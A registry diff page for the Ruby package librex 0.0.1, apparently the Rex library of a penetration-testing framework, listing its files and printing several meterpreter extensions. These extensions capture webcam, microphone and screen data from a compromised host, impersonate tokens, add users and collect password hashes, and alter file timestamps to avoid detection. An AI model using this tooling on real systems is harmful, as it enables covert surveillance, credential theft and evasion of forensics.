RubyGems - librex - Versions diffs - 0.0.1 - Mend

librex 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (370) hide show

data/README +4 -0
data/lib/rex.rb +101 -0
data/lib/rex.rb.ts.rb +70 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +103 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/sparc.rb.ut.rb +18 -0
data/lib/rex/arch/x86.rb +513 -0
data/lib/rex/arch/x86.rb.ut.rb +93 -0
data/lib/rex/assembly/nasm.rb +100 -0
data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +281 -0
data/lib/rex/constants.rb +113 -0
data/lib/rex/elfparsey.rb +11 -0
data/lib/rex/elfparsey/elf.rb +123 -0
data/lib/rex/elfparsey/elfbase.rb +260 -0
data/lib/rex/elfparsey/exceptions.rb +27 -0
data/lib/rex/elfscan.rb +12 -0
data/lib/rex/elfscan/scanner.rb +207 -0
data/lib/rex/elfscan/search.rb +46 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +113 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
data/lib/rex/encoder/ndr.rb +89 -0
data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +106 -0
data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor.rb.ts.rb +14 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exceptions.rb.ut.rb +44 -0
data/lib/rex/exploitation/cmdstager.rb +133 -0
data/lib/rex/exploitation/egghunter.rb +143 -0
data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
data/lib/rex/exploitation/encryptjs.rb +77 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +94 -0
data/lib/rex/exploitation/javascriptosdetect.rb +735 -0
data/lib/rex/exploitation/obfuscatejs.rb +335 -0
data/lib/rex/exploitation/opcodedb.rb +818 -0
data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
data/lib/rex/exploitation/seh.rb +92 -0
data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
data/lib/rex/file.rb +84 -0
data/lib/rex/file.rb.ut.rb +16 -0
data/lib/rex/image_source.rb +12 -0
data/lib/rex/image_source/disk.rb +60 -0
data/lib/rex/image_source/image_source.rb +46 -0
data/lib/rex/image_source/memory.rb +37 -0
data/lib/rex/io/bidirectional_pipe.rb +157 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/stream.rb +313 -0
data/lib/rex/io/stream_abstraction.rb +186 -0
data/lib/rex/io/stream_server.rb +211 -0
data/lib/rex/job_container.rb +202 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +179 -0
data/lib/rex/logging/log_sink.rb +42 -0
data/lib/rex/logging/sinks/flatfile.rb +55 -0
data/lib/rex/logging/sinks/stderr.rb +43 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +9 -0
data/lib/rex/mime/header.rb +75 -0
data/lib/rex/mime/message.rb +112 -0
data/lib/rex/mime/part.rb +20 -0
data/lib/rex/nop/opty2.rb +108 -0
data/lib/rex/nop/opty2.rb.ut.rb +23 -0
data/lib/rex/nop/opty2_tables.rb +300 -0
data/lib/rex/ole.rb +128 -0
data/lib/rex/ole/clsid.rb +47 -0
data/lib/rex/ole/difat.rb +141 -0
data/lib/rex/ole/directory.rb +230 -0
data/lib/rex/ole/direntry.rb +240 -0
data/lib/rex/ole/fat.rb +99 -0
data/lib/rex/ole/header.rb +204 -0
data/lib/rex/ole/minifat.rb +77 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +395 -0
data/lib/rex/ole/stream.rb +53 -0
data/lib/rex/ole/substorage.rb +49 -0
data/lib/rex/ole/util.rb +157 -0
data/lib/rex/parser/arguments.rb +97 -0
data/lib/rex/parser/arguments.rb.ut.rb +67 -0
data/lib/rex/parser/ini.rb +185 -0
data/lib/rex/parser/ini.rb.ut.rb +29 -0
data/lib/rex/parser/nmap_xml.rb +111 -0
data/lib/rex/payloads.rb +1 -0
data/lib/rex/payloads/win32.rb +2 -0
data/lib/rex/payloads/win32/common.rb +26 -0
data/lib/rex/payloads/win32/kernel.rb +53 -0
data/lib/rex/payloads/win32/kernel/common.rb +54 -0
data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
data/lib/rex/payloads/win32/kernel/stager.rb +171 -0
data/lib/rex/peparsey.rb +12 -0
data/lib/rex/peparsey/exceptions.rb +32 -0
data/lib/rex/peparsey/pe.rb +188 -0
data/lib/rex/peparsey/pe_memdump.rb +63 -0
data/lib/rex/peparsey/pebase.rb +1655 -0
data/lib/rex/peparsey/section.rb +136 -0
data/lib/rex/pescan.rb +13 -0
data/lib/rex/pescan/analyze.rb +309 -0
data/lib/rex/pescan/scanner.rb +206 -0
data/lib/rex/pescan/search.rb +56 -0
data/lib/rex/platforms.rb +1 -0
data/lib/rex/platforms/windows.rb +51 -0
data/lib/rex/poly.rb +132 -0
data/lib/rex/poly/block.rb +468 -0
data/lib/rex/poly/register.rb +100 -0
data/lib/rex/poly/register/x86.rb +40 -0
data/lib/rex/post.rb +8 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +4 -0
data/lib/rex/post/meterpreter/channel.rb +438 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +335 -0
data/lib/rex/post/meterpreter/client_core.rb +274 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +104 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +100 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +24 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +273 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +235 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +184 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +361 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +182 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +174 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +185 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +596 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +409 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +135 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +595 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +63 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +376 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +270 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +484 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +12 -0
data/lib/rex/proto.rb.ts.rb +8 -0
data/lib/rex/proto/dcerpc.rb +6 -0
data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
data/lib/rex/proto/dcerpc/client.rb +358 -0
data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
data/lib/rex/proto/dcerpc/handle.rb +47 -0
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
data/lib/rex/proto/dcerpc/ndr.rb +72 -0
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
data/lib/rex/proto/dcerpc/packet.rb +253 -0
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
data/lib/rex/proto/dcerpc/response.rb +186 -0
data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
data/lib/rex/proto/dcerpc/uuid.rb +84 -0
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
data/lib/rex/proto/drda.rb +5 -0
data/lib/rex/proto/drda.rb.ts.rb +17 -0
data/lib/rex/proto/drda/constants.rb +49 -0
data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
data/lib/rex/proto/drda/packet.rb +252 -0
data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
data/lib/rex/proto/drda/utils.rb +123 -0
data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
data/lib/rex/proto/http.rb +5 -0
data/lib/rex/proto/http.rb.ts.rb +12 -0
data/lib/rex/proto/http/client.rb +817 -0
data/lib/rex/proto/http/client.rb.ut.rb +93 -0
data/lib/rex/proto/http/handler.rb +46 -0
data/lib/rex/proto/http/handler/erb.rb +128 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
data/lib/rex/proto/http/handler/proc.rb +54 -0
data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
data/lib/rex/proto/http/header.rb +161 -0
data/lib/rex/proto/http/header.rb.ut.rb +46 -0
data/lib/rex/proto/http/packet.rb +394 -0
data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
data/lib/rex/proto/http/request.rb +356 -0
data/lib/rex/proto/http/request.rb.ut.rb +214 -0
data/lib/rex/proto/http/response.rb +85 -0
data/lib/rex/proto/http/response.rb.ut.rb +149 -0
data/lib/rex/proto/http/server.rb +367 -0
data/lib/rex/proto/http/server.rb.ut.rb +79 -0
data/lib/rex/proto/smb.rb +7 -0
data/lib/rex/proto/smb.rb.ts.rb +8 -0
data/lib/rex/proto/smb/client.rb +1733 -0
data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
data/lib/rex/proto/smb/constants.rb +1062 -0
data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
data/lib/rex/proto/smb/crypt.rb +95 -0
data/lib/rex/proto/smb/crypt.rb.ut.rb +20 -0
data/lib/rex/proto/smb/evasions.rb +65 -0
data/lib/rex/proto/smb/exceptions.rb +846 -0
data/lib/rex/proto/smb/simpleclient.rb +292 -0
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
data/lib/rex/proto/smb/utils.rb +514 -0
data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
data/lib/rex/proto/sunrpc.rb +1 -0
data/lib/rex/proto/sunrpc/client.rb +195 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +59 -0
data/lib/rex/script/meterpreter.rb +9 -0
data/lib/rex/script/shell.rb +9 -0
data/lib/rex/service.rb +48 -0
data/lib/rex/service_manager.rb +141 -0
data/lib/rex/service_manager.rb.ut.rb +32 -0
data/lib/rex/services/local_relay.rb +423 -0
data/lib/rex/socket.rb +586 -0
data/lib/rex/socket.rb.ut.rb +86 -0
data/lib/rex/socket/comm.rb +119 -0
data/lib/rex/socket/comm/local.rb +409 -0
data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
data/lib/rex/socket/ip.rb +129 -0
data/lib/rex/socket/parameters.rb +345 -0
data/lib/rex/socket/parameters.rb.ut.rb +51 -0
data/lib/rex/socket/range_walker.rb +295 -0
data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
data/lib/rex/socket/ssl_tcp.rb +184 -0
data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
data/lib/rex/socket/ssl_tcp_server.rb +122 -0
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +51 -0
data/lib/rex/socket/subnet_walker.rb +75 -0
data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
data/lib/rex/socket/switch_board.rb +272 -0
data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
data/lib/rex/socket/tcp.rb +76 -0
data/lib/rex/socket/tcp.rb.ut.rb +64 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
data/lib/rex/socket/udp.rb +157 -0
data/lib/rex/socket/udp.rb.ut.rb +44 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +94 -0
data/lib/rex/sync/read_write_lock.rb +176 -0
data/lib/rex/sync/ref.rb +57 -0
data/lib/rex/sync/thread_safe.rb +82 -0
data/lib/rex/test.rb +35 -0
data/lib/rex/text.rb +1029 -0
data/lib/rex/text.rb.ut.rb +168 -0
data/lib/rex/time.rb +65 -0
data/lib/rex/transformer.rb +115 -0
data/lib/rex/transformer.rb.ut.rb +38 -0
data/lib/rex/ui.rb +21 -0
data/lib/rex/ui/interactive.rb +252 -0
data/lib/rex/ui/output.rb +80 -0
data/lib/rex/ui/output/none.rb +18 -0
data/lib/rex/ui/progress_tracker.rb +96 -0
data/lib/rex/ui/subscriber.rb +149 -0
data/lib/rex/ui/text/color.rb +97 -0
data/lib/rex/ui/text/color.rb.ut.rb +18 -0
data/lib/rex/ui/text/dispatcher_shell.rb +382 -0
data/lib/rex/ui/text/input.rb +117 -0
data/lib/rex/ui/text/input/buffer.rb +75 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +95 -0
data/lib/rex/ui/text/input/stdio.rb +45 -0
data/lib/rex/ui/text/irb_shell.rb +55 -0
data/lib/rex/ui/text/output.rb +80 -0
data/lib/rex/ui/text/output/buffer.rb +65 -0
data/lib/rex/ui/text/output/file.rb +37 -0
data/lib/rex/ui/text/output/socket.rb +43 -0
data/lib/rex/ui/text/output/stdio.rb +40 -0
data/lib/rex/ui/text/progress_tracker.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
data/lib/rex/ui/text/shell.rb +321 -0
data/lib/rex/ui/text/table.rb +254 -0
data/lib/rex/ui/text/table.rb.ut.rb +55 -0
data/lib/rex/zip.rb +93 -0
data/lib/rex/zip/archive.rb +91 -0
data/lib/rex/zip/blocks.rb +182 -0
data/lib/rex/zip/entry.rb +95 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +435 -0

data/lib/rex/post/meterpreter/dependencies.rb ADDED

@@ -0,0 +1,3 @@
+#!/usr/bin/env ruby
+require 'rex/post/permission'

data/lib/rex/post/meterpreter/extension.rb ADDED

@@ -0,0 +1,32 @@
+#!/usr/bin/env ruby
+module Rex
+module Post
+module Meterpreter
+###
+#
+# Base class for all extensions that holds a reference to the
+# client context that they are part of.  Each extension also has a defined
+# name through which it is referenced.
+#
+###
+class Extension
+	#
+	# Initializes the client and name attributes.
+	#
+	def initialize(client, name)
+		self.client = client
+		self.name   = name
+	end
+	#
+	# The name of the extension.
+	#
+	attr_accessor :name
+protected
+	attr_accessor :client # :nodoc:
+end
+end; end; end

data/lib/rex/post/meterpreter/extensions/espia/espia.rb ADDED

@@ -0,0 +1,58 @@
+#!/usr/bin/env ruby
+require 'rex/post/meterpreter/extensions/espia/tlv'
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Espia
+###
+#
+# This meterpreter extensions interface that is capable
+# grab webcam frame and recor mic audio
+#
+###
+class Espia < Extension
+	def initialize(client)
+		super(client, 'espia')
+		client.register_extension_aliases(
+			[
+				{
+					'name' => 'espia',
+					'ext'  => self
+				},
+			])
+	end
+	def espia_video_get_dev_image()
+		request = Packet.create_request('espia_video_get_dev_image')
+		response = client.send_request(request)
+		return true
+	end
+	def espia_audio_get_dev_audio(rsecs)
+		request = Packet.create_request('espia_audio_get_dev_audio')
+		request.add_tlv(TLV_TYPE_DEV_RECTIME, rsecs)
+		response = client.send_request(request)
+		return true
+	end
+	def espia_image_get_dev_screen
+		request  = Packet.create_request( 'espia_image_get_dev_screen' )
+		response = client.send_request( request )
+		if( response.result == 0 )
+			return response.get_tlv_value( TLV_TYPE_DEV_SCREEN )
+		end
+		return nil
+	end
+end
+end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/espia/tlv.rb ADDED

@@ -0,0 +1,16 @@
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Espia
+TLV_TYPE_DEV_IMAGE = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 911)
+TLV_TYPE_DEV_AUDIO = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 912)
+TLV_TYPE_DEV_SCREEN = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 913)
+TLV_TYPE_DEV_RECTIME = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 914)
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb ADDED

@@ -0,0 +1,94 @@
+#!/usr/bin/env ruby
+require 'rex/post/meterpreter/extensions/incognito/tlv'
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Incognito
+###
+#
+# This meterpreter extensions a privilege escalation interface that is capable
+# of doing things like dumping password hashes and performing local
+# exploitation.
+#
+###
+class Incognito < Extension
+	def initialize(client)
+		super(client, 'incognito')
+		client.register_extension_aliases(
+			[
+				{
+					'name' => 'incognito',
+					'ext'  => self
+				},
+			])
+	end
+	def incognito_list_tokens(token_order)
+		request = Packet.create_request('incognito_list_tokens')
+		request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)
+		response = client.send_request(request)
+		return {
+			'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),
+			'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)
+		}
+	end
+	def incognito_impersonate_token(username)
+		request = Packet.create_request('incognito_impersonate_token')
+		request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)
+		response = client.send_request(request)
+		response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
+	end
+	def incognito_add_user(host, username, password)
+		request = Packet.create_request('incognito_add_user')
+		request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
+		request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)
+		request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
+		response = client.send_request(request)
+		response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
+	end
+	def incognito_add_group_user(host, groupname, username)
+		request = Packet.create_request('incognito_add_group_user')
+		request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
+		request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
+		request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
+		response = client.send_request(request)
+		response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
+	end
+	def incognito_add_localgroup_user(host, groupname, username)
+		request = Packet.create_request('incognito_add_localgroup_user')
+		request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
+		request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
+		request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
+		response = client.send_request(request)
+		response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
+	end
+	def incognito_snarf_hashes(host)
+		request = Packet.create_request('incognito_snarf_hashes')
+		request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
+		response = client.send_request(request)
+		return true
+	end
+end
+end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb ADDED

@@ -0,0 +1,21 @@
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Incognito
+TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION        	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
+TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION        	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
+TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER       	= TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 4)
+TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
+TLV_TYPE_INCOGNITO_GENERIC_RESPONSE    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 6)
+TLV_TYPE_INCOGNITO_USERNAME    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 7)
+TLV_TYPE_INCOGNITO_PASSWORD    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8)
+TLV_TYPE_INCOGNITO_SERVERNAME    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9)
+TLV_TYPE_INCOGNITO_GROUPNAME    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10)
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/extensions/priv/fs.rb ADDED

@@ -0,0 +1,118 @@
+#!/usr/bin/env ruby
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Priv
+###
+#
+# This class provides an interface to modifying the file system to avoid
+# detection, such as by modifying extended file system attributes.
+#
+###
+class Fs
+	#
+	# Initializes the file system subsystem of the privilege escalation
+	# extension.
+	#
+	def initialize(client)
+		self.client = client
+	end
+	#
+	# Returns a hash of the Modified, Accessed, Created, and Entry Modified
+	# values for the specified file path.
+	#
+	def get_file_mace(file_path)
+		request = Packet.create_request('priv_fs_get_file_mace')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
+		response = client.send_request(request)
+		# Return the hash of times associated with the MACE values
+		begin
+			return {
+				'Modified'       => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_MODIFIED)),
+				'Accessed'       => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_ACCESSED)),
+				'Created'        => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_CREATED)),
+				'Entry Modified' => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_EMODIFIED))
+			}
+		rescue RangeError
+			raise RangeError, "Invalid MACE values"
+		end
+	end
+	#
+	# Sets the Modified, Accessed, Created, and Entry Modified attributes of
+	# the specified file path.  If a nil is supplied for a value, it will not
+	# be modified.  Otherwise, the times should be instances of the Time class.
+	#
+	def set_file_mace(file_path, modified = nil, accessed = nil, created = nil,
+		entry_modified = nil)
+		request = Packet.create_request('priv_fs_set_file_mace')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
+		request.add_tlv(TLV_TYPE_FS_FILE_MODIFIED, modified.to_i) if (modified)
+		request.add_tlv(TLV_TYPE_FS_FILE_ACCESSED, accessed.to_i) if (accessed)
+		request.add_tlv(TLV_TYPE_FS_FILE_CREATED, created.to_i) if (created)
+		request.add_tlv(TLV_TYPE_FS_FILE_EMODIFIED, entry_modified.to_i) if (entry_modified)
+		client.send_request(request)
+		true
+	end
+	#
+	# Sets the MACE attributes of the specified target_file_path to the MACE
+	# attributes of the source_file_path.
+	#
+	def set_file_mace_from_file(target_file_path, source_file_path)
+		request = Packet.create_request('priv_fs_set_file_mace_from_file')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, target_file_path)
+		request.add_tlv(TLV_TYPE_FS_SRC_FILE_PATH, source_file_path)
+		client.send_request(request)
+		true
+	end
+	#
+	# Sets the MACE values to the minimum threshold that will cause them to not
+	# be displayed by most all products for a file.
+	#
+	def blank_file_mace(file_path)
